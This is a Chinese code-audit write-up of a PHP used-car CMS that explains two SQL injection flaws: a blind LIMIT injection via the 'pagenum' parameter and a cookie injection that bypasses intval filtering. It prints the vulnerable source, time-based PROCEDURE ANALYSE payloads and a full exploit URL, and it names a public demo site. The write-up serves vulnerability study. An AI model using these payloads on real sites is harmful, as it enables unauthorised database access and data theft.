代码审计之某汽车网源码-安全小百科

0x00 前记
这里的漏洞分析只挑选了两个觉得有新意的点来说，整个cms肯定还是有很多漏洞，可以说是值得练手的一款cms，并且由于是根据某付费cms二次制作完成，因此市面上这类汽车网源码肯定也是千疮百孔，刷洞的可以走起~

0x01 cms简介
大泉州汽车网整站程序是一个以PHP+MySQL进行开发的二手车发布网站源码。
大泉州汽车网整站程序PHP生成html开源版更新日志：
V1.1.2
1.增加手机版，可以绑定二级域名访问。如http://m.myname.com 绑定到m目录即可, 手机版模版位置:templates/default/m/
2.修正车行商铺首页和车型图片路径不显示
3.修正车型中心图片路径不对。
4.修正用户注册CSS路径。
5.修正用户登录CSS路径。
6.修正百度地图,不需参数可以直接定位
源码下载地址：http://down.chinaz.com/soft/39115.htm
demo地址：http://www.dqzqcw.com/

0x02 漏洞分析
下面两个洞是不那么常见的洞，或者说跟平时挖掘思路不太一致，这里拿出来分享一下，也给那些代码审计新手一点新的思路。现在由于大多数参数都有过滤机制，因此一些常见的注入漏洞可以说是很难找了，笔者如果想要找sql注入漏洞，那么喜欢挑像in类型的注入或者limit、order by这种，这里包含的参数正常都是数字类型，也就是说无需单引号包裹的，所以如果没做数字类型的检查，那么这里很可能就会存在问题，下面进入正篇！

limit注入
这里漏洞代码位于index/2s.php第288行

<br />
// 每页显示条数<br />
if (isset($_GET[‘pagenum’])) {<br />
  setMyCookie(“pagenum”, $_GET[‘pagenum’], time() + COOKIETIME);<br />
} else {<br />
  setMyCookie(“pagenum”, 32, time() + COOKIETIME);<br />
}

// 每页显示条数

if (isset($_GET[‘pagenum’])) {

setMyCookie(“pagenum”, $_GET[‘pagenum’], time() + COOKIETIME);

} else {

setMyCookie(“pagenum”, 32, time() + COOKIETIME);

}

这里传入参数pagenum，然后将值赋到cookie里去（这也是这款cms的特色之处，所有的参数均会存储到cookie，然后在后面做处理的时候从cookie中取值），接着我们跟进pagenum参数来到index/2s.php第301行

<br />
include(INC_DIR . ‘Page.class.php’);<br />
$Page = new Page($db -> tb_prefix . ‘cars’, $where, ‘*’, $_COOKIE[‘pagenum’], $orderby);<br />
$listnum = $Page -> total_num;<br />
$list = $Page -> get_data();

include(INC_DIR . ‘Page.class.php’);

$Page = new Page($db -> tb_prefix . ‘cars’, $where, ‘*’, $_COOKIE[‘pagenum’], $orderby);

$listnum = $Page -> total_num;

$list = $Page -> get_data();

这里可以看到我们的pagenum参数已经是从cookie中取值来进行操作，继续跟进Page函数来到include/Page.class.php第33行

<br />
*<br />
   * @param string $tbname 要操作的表名<br />
   * @param string $where 定位条件<br />
   * @param string $field 要查询的字段<br />
   * @param string $pageSize 每页显示数量<br />
   * @param string $orderBy 排序方式<br />
   */<br />
  function Page($tbname, $where = ‘1=1’, $field = ‘*’, $page_size = 20, $order_by = ”, $group_by = ”) {<br />
      !mysql_ping() && exit(‘mysql can not connect!’);</p>
<p>      if (!empty($page_size)) $this -> page_size = $page_size;<br />
      // 获取总记录条数<br />
      $sql = “SELECT count(*) as row_num FROM $tbname WHERE $where”;<br />
      $row_num = mysql_fetch_array(mysql_query($sql));<br />
      $this -> total_num = $row_num[‘row_num’];<br />
      //$this -> total_page = ceil($this -> total_num / $page_size);<br />
      // 当前page<br />
      $page = isset($_GET[‘page’]) && intval($_GET[‘page’]) > 0 ? intval($_GET[‘page’]) : 1;<br />
      $this -> page = ($page < $this -> total_page || $this -> total_page == 0) ? $page : $this -> total_page;<br />
      // 计算查询的起始值<br />
      $start = ($this -> page – 1) * $page_size;<br />
      // 查询结果</p>
<p>      if($page_size==0){<br />
          $sql = “SELECT $field FROM $tbname WHERE $where” .  ($group_by ? ‘ GROUP BY ‘ . $group_by : ”).($order_by ? ‘ ORDER BY ‘ . $order_by : ”) ;<br />
      }else{<br />
          $this -> total_page = ceil($this -> total_num / $page_size);<br />
          $sql = “SELECT $field FROM $tbname WHERE $where” . ($group_by ? ‘ GROUP BY ‘ . $group_by : ”).($order_by ? ‘ ORDER BY ‘ . $order_by : ”) . ” LIMIT $start,$this->page_size”;<br />
      }</p>
<p>      $result = mysql_query($sql);</p>
<p>      $data = array();<br />
      while ($row = mysql_fetch_assoc($result)) {<br />
          $data[] = $row;<br />
      }<br />
      $this -> data = $data;<br />
  }

* @param string $tbname 要操作的表名

* @param string $where 定位条件

* @param string $field 要查询的字段

* @param string $pageSize 每页显示数量

* @param string $orderBy 排序方式

function Page($tbname, $where = ‘1=1’, $field = ‘*’, $page_size = 20, $order_by = ”, $group_by = ”) {

!mysql_ping() && exit(‘mysql can not connect!’);

if (!empty($page_size)) $this -> page_size = $page_size;

// 获取总记录条数

$sql = “SELECT count(*) as row_num FROM $tbname WHERE $where”;

$row_num = mysql_fetch_array(mysql_query($sql));

$this -> total_num = $row_num[‘row_num’];

//$this -> total_page = ceil($this -> total_num / $page_size);

// 当前page

$page = isset($_GET[‘page’]) && intval($_GET[‘page’]) > 0 ? intval($_GET[‘page’]) : 1;

$this -> page = ($page < $this -> total_page || $this -> total_page == 0) ? $page : $this -> total_page;

// 计算查询的起始值

$start = ($this -> page – 1) * $page_size;

// 查询结果

if($page_size==0){

$sql = “SELECT $field FROM $tbname WHERE $where” . ($group_by ? ‘ GROUP BY ‘ . $group_by : ”).($order_by ? ‘ ORDER BY ‘ . $order_by : ”) ;

}else{

$this -> total_page = ceil($this -> total_num / $page_size);

$sql = “SELECT $field FROM $tbname WHERE $where” . ($group_by ? ‘ GROUP BY ‘ . $group_by : ”).($order_by ? ‘ ORDER BY ‘ . $order_by : ”) . ” LIMIT $start,$this->page_size”;

}

$result = mysql_query($sql);

$data = array();

while ($row = mysql_fetch_assoc($result)) {

$data[] = $row;

}

$this -> data = $data;

}

这里pagenum对应的参数为$page_size参数，因此这里我们需要来看看page_size参数处于sql语句中的哪个位置。这里可以看到第28行处于limit之后，并且这里没有开启错误回显，因此该漏洞为前台无限制limit盲注漏洞。
我们知道在遇到limit注入时，使用procedure analyse即可实现注入，但是网上搜到的大多是利用报错来进行注入，这里只能盲注，因此也花了不少时间来测试sql语句。
常见的limit报错语句如下

<br />
MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,user())),1);<br />
ERROR 1105 (HY000): XPATH syntax error: ‘~root@localhost’

1 2	MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,user())),1); ERROR 1105 (HY000): XPATH syntax error: ‘~root@localhost’

这里想要改成时间盲注语句也很简单，只要对user()那里做修改即可
时间盲注语句如下

<br />
MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse((extractvalue(rand(),concat(0x3a,(IF(ascii(MID(user(),1,1))=114, BENCHMARK(3000000,SHA1(1)),1))))),1);<br />
ERROR 1105 (HY000): XPATH syntax error: ‘:0’

1 2	MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse((extractvalue(rand(),concat(0x3a,(IF(ascii(MID(user(),1,1))=114, BENCHMARK(3000000,SHA1(1)),1))))),1); ERROR 1105 (HY000): XPATH syntax error: ‘:0’

最后我们来到实战中做检验，完整的payload如下

<br />
http://127.0.0.1/?m=2s&pagenum=1 PROCEDURE analyse((extractvalue(rand(),concat(0x3a,(IF(ascii(MID(user(),1,1))=114, BENCHMARK(6000000,SHA1(1)),1))))),1)

1	http://127.0.0.1/?m=2s&pagenum=1 PROCEDURE analyse((extractvalue(rand(),concat(0x3a,(IF(ascii(MID(user(),1,1))=114, BENCHMARK(6000000,SHA1(1)),1))))),1)

延时差距还是很明显的~

cookie注入
这个漏洞其实可以说是逻辑上的漏洞，我们刚才看到了程序的处理流程，先将GET或者POST参数给赋值到cookie里，然后再从cookie里调用，那么这中间会出现什么问题呢？

<br />
if ($arr_c[‘0’] == “p”) {<br />
      if (isset($arr_c[1])) {<br />
          setMyCookie(“price”, intval($arr_c[1]), time() + COOKIETIME);<br />
      }<br />
      if (isset($_COOKIE[‘price’]) and $_COOKIE[‘price’] == 0) {<br />
          setMyCookie(“price”, ”, time() – COOKIETIME);<br />
      }<br />
  }<br />
  // 车龄<br />
  elseif ($arr_c[‘0’] == “a”) {<br />
      if (isset($arr_c[1])) {<br />
          setMyCookie(“age”, intval($arr_c[1]), time() + COOKIETIME);<br />
      }<br />
      if (isset($_COOKIE[‘age’]) and $_COOKIE[‘age’] == 0) {<br />
          setMyCookie(“age”, ”, time() – COOKIETIME);<br />
      }<br />
  }<br />
  // 车型<br />
  elseif ($arr_c[‘0’] == “m”) {<br />
      if (isset($arr_c[1])) {<br />
          setMyCookie(“model”, intval($arr_c[1]), time() + COOKIETIME);<br />
      }<br />
      if (isset($_COOKIE[‘model’]) and $_COOKIE[‘model’] == 0) {<br />
          setMyCookie(“model”, ”, time() – COOKIETIME);<br />
      }<br />
  }

if ($arr_c[‘0’] == “p”) {

if (isset($arr_c[1])) {

setMyCookie(“price”, intval($arr_c[1]), time() + COOKIETIME);

}

if (isset($_COOKIE[‘price’]) and $_COOKIE[‘price’] == 0) {

setMyCookie(“price”, ”, time() – COOKIETIME);

}

// 车龄

elseif ($arr_c[‘0’] == “a”) {

if (isset($arr_c[1])) {

setMyCookie(“age”, intval($arr_c[1]), time() + COOKIETIME);

}

if (isset($_COOKIE[‘age’]) and $_COOKIE[‘age’] == 0) {

setMyCookie(“age”, ”, time() – COOKIETIME);

}

// 车型

elseif ($arr_c[‘0’] == “m”) {

if (isset($arr_c[1])) {

setMyCookie(“model”, intval($arr_c[1]), time() + COOKIETIME);

}

if (isset($_COOKIE[‘model’]) and $_COOKIE[‘model’] == 0) {

setMyCookie(“model”, ”, time() – COOKIETIME);

}

这里随便抽取了一段，可以看到传进来的参数大概是p_1或者a_2这种，下划线前面的表示类型，下划线后面的表示数值，并且会对数值做intval处理，那么这里最简单的思路就是来找一找有没有漏网之鱼，就是没有做intval处理，并且最终进入到sql语句里的参数，当然这里也有，不过不是本文的讨论重点。
这里就以上面的车型为例，这里假如GET为m_1，那么cookie中的model值则为1，然后我们跟进这个cookie[‘model’]
来到190行

<br />
if (isset($_COOKIE[‘model’]) and $_COOKIE[‘model’]<>0) {<br />
  $where .= ” and p_model = “.$_COOKIE[‘model’];<br />
}

if (isset($_COOKIE[‘model’]) and $_COOKIE[‘model’]<>0) {

$where .= ” and p_model = “.$_COOKIE[‘model’];

}

这里可以看到直接拼接进了where里，最终就进入了上面limit注入里的Page函数。
回过头来看，这个model参数由于在赋值时会进入intval函数的处理，因此用常规的直接拼接思路肯定是不可以的，但是这里出现的问题就是cookie值没有进行初始化，也就是说我们现在抓包然后赋值一个新的cookie值，就可以直接绕过这个从GET到COOKIE的处理，也就绕过了intval函数的处理，下面开始抓包演示！

这里可以看到cookie中的m值为41，那么想要绕过前面的从GET处理到COOKIE处理，采用直接cookie赋值的方法即可~

可以看到延时成功~

0x03 总结
这里漏洞利用起来也不是很复杂，只是姿势可能跟平时不太一样，所以拿出来分享一下~
上述如有不当之处，敬请指出